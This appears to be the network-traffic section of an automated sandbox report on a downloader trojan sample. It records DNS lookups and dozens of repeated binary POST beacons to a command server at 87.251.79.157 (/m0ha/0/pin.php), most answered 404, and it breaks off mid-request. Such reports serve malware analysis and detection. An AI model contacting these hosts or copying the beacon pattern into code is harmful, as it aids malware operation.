                                              Mar 15, 2021 20:00:48.692806959 CET | 8.8.8.8 | 192.168.2.5 | 0x2b53 | No error (0) | liverpooldabestteamoftheworld.com | | 172.67.197.219 | A (IP address) | IN (0x0001)
                                              Mar 15, 2021 20:00:48.692806959 CET | 8.8.8.8 | 192.168.2.5 | 0x2b53 | No error (0) | liverpooldabestteamoftheworld.com | | 104.21.52.98 | A (IP address) | IN (0x0001)
                                              Mar 15, 2021 20:00:48.957503080 CET | 8.8.8.8 | 192.168.2.5 | 0xbfbe | No error (0) | liverpooldabestteamoftheworld.com | | 172.67.197.219 | A (IP address) | IN (0x0001)
                                              Mar 15, 2021 20:00:48.957503080 CET | 8.8.8.8 | 192.168.2.5 | 0xbfbe | No error (0) | liverpooldabestteamoftheworld.com | | 104.21.52.98 | A (IP address) | IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • liverpooldabestteamoftheworld.com
                                              • 87.251.79.157

                                              HTTP Packets

                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              0 | 192.168.2.5 | 49691 | 172.67.197.219 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:00:48.773063898 CET | 289 | OUT | GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-0E44846E8DBE171CF83840F8DBF160DC.html HTTP/1.1
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                              Host: liverpooldabestteamoftheworld.com
                                              Connection: Keep-Alive
                                              Mar 15, 2021 20:00:48.883388996 CET | 290 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Mon, 15 Mar 2021 19:00:48 GMT
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Cache-Control: max-age=3600
                                              Expires: Mon, 15 Mar 2021 20:00:48 GMT
                                              Location: https://liverpooldabestteamoftheworld.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-0E44846E8DBE171CF83840F8DBF160DC.html
                                              cf-request-id: 08d8dc362d00002d1fd7b59000000001
                                              Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Y5u39yhLVT6B3hK9UpdkkiTmNrW2jcGYb%2FRiFF%2FyJ%2Bwq%2F19s%2FRFdow0Sq4pj6bguojspKZszWn7HPTnaKnw83ItNiwuOda6KPh5XUo6xxtDICWuOJVly2IGTAc7udn04XaY%3D"}]}
                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 6307fc9d09112d1f-LHR
                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                              Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              1 | 192.168.2.5 | 49696 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:00:59.299750090 CET | 1132 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 192
                                              Connection: close
                                              Mar 15, 2021 20:00:59.613749027 CET | 1133 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:00:59 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 15
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              10 | 192.168.2.5 | 49706 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:10.247131109 CET | 1145 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:10.543725967 CET | 1150 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:10 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              100 | 192.168.2.5 | 49796 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              101 | 192.168.2.5 | 49797 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              102 | 192.168.2.5 | 49798 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              103 | 192.168.2.5 | 49799 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              104 | 192.168.2.5 | 49800 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              105 | 192.168.2.5 | 49801 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              106 | 192.168.2.5 | 49802 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              107 | 192.168.2.5 | 49803 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              108 | 192.168.2.5 | 49804 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              109 | 192.168.2.5 | 49805 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              11 | 192.168.2.5 | 49707 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:10.814029932 CET | 1154 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:11.073518991 CET | 1157 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:10 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              110 | 192.168.2.5 | 49806 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              111 | 192.168.2.5 | 49807 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              112 | 192.168.2.5 | 49808 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              113 | 192.168.2.5 | 49809 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              114 | 192.168.2.5 | 49810 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              115 | 192.168.2.5 | 49811 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              116 | 192.168.2.5 | 49812 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              117 | 192.168.2.5 | 49813 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              118 | 192.168.2.5 | 49814 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              119 | 192.168.2.5 | 49815 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              12 | 192.168.2.5 | 49708 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:11.333466053 CET | 1158 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:11.586393118 CET | 1159 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:11 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              120 | 192.168.2.5 | 49816 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              121 | 192.168.2.5 | 49817 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              122 | 192.168.2.5 | 49818 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              123 | 192.168.2.5 | 49819 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              124 | 192.168.2.5 | 49820 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              125 | 192.168.2.5 | 49821 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              126 | 192.168.2.5 | 49822 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              127 | 192.168.2.5 | 49823 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              128 | 192.168.2.5 | 49824 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              129 | 192.168.2.5 | 49825 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              13 | 192.168.2.5 | 49709 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:11.848732948 CET | 1160 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:12.111887932 CET | 1161 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:11 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              130 | 192.168.2.5 | 49826 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              14 | 192.168.2.5 | 49710 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:12.375236988 CET | 1161 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:12.661370993 CET | 1162 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:12 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              15 | 192.168.2.5 | 49711 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:12.929996967 CET | 1163 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:13.460848093 CET | 1163 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:12 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              16 | 192.168.2.5 | 49712 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:13.736500025 CET | 1164 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:14.088730097 CET | 1165 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:13 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              17 | 192.168.2.5 | 49713 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:14.345824003 CET | 1165 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:14.636305094 CET | 1166 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:14 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              18 | 192.168.2.5 | 49714 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:14.911689997 CET | 1167 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:15.317789078 CET | 1167 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:14 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              19 | 192.168.2.5 | 49715 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:15.558859110 CET | 1168 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:15.838732958 CET | 1169 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:15 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID: 2 | Source IP: 192.168.2.5 | Source Port: 49697 | Destination IP: 87.251.79.157 | Destination Port: 80 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:00:59.912760019 CET | 1134 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 192
                                              Connection: close
                                              Mar 15, 2021 20:01:00.844660997 CET | 1134 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:00:59 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 15
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID: 20 | Source IP: 192.168.2.5 | Source Port: 49716 | Destination IP: 87.251.79.157 | Destination Port: 80 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:16.089930058 CET | 1169 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:16.392034054 CET | 1170 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:16 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID: 21 | Source IP: 192.168.2.5 | Source Port: 49717 | Destination IP: 87.251.79.157 | Destination Port: 80 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:16.657505989 CET | 1171 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:16.946177006 CET | 1171 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:16 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID: 22 | Source IP: 192.168.2.5 | Source Port: 49718 | Destination IP: 87.251.79.157 | Destination Port: 80 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:17.197165012 CET | 1172 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:17.449021101 CET | 1173 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:17 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID: 23 | Source IP: 192.168.2.5 | Source Port: 49719 | Destination IP: 87.251.79.157 | Destination Port: 80 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:17.695734024 CET | 1173 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
